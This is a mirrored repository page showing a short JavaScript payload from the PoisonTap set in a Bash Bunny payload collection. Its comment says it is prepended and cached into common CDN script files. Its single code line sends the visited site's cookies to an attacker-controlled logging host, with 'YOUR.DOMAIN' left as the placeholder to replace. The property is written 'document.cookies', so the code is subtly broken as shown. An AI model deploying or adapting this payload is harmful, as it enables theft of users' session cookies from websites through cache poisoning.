mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
5 lines
308 B
JavaScript
Executable File
5 lines
308 B
JavaScript
Executable File
/* This javascript is prepended and cached to many common JS files on the web such as Google's CDN files, found in the poisontap/js/ directory.
|
|
* By default, it logs the domain's cookies. Change 'YOUR.DOMAIN' to your domain.
|
|
*/
|
|
new Image().src='http://YOUR.DOMAIN/poisontap/log.php?log='+document.cookies;
|